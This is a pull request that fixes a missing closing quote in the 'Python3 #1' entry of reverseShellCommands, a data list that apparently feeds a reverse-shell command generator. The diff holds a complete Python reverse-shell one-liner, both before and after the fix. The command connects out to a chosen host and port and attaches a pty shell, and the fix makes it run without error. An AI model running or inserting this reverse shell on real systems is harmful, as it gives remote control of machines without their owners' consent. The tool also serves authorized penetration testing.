### PR TITLE
Fixed missing "'" in "Python3 1"

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -190,7 +190,7 @@ const reverseShellCommands = withCommandType(
         },
         {
             "name": "Python3 #1",
-            "command": "export RHOST=\"{ip}\";export RPORT={port};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")",
+            "command": "export RHOST=\"{ip}\";export RPORT={port};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'",
             "meta": ["linux", "mac"]
         },
         {


### PR DESCRIPTION
Missing "'" in "Python3 1" causes "Syntax error: Unterminated quoted string" error during execution.
Fixed by adding "'" at the end of the command.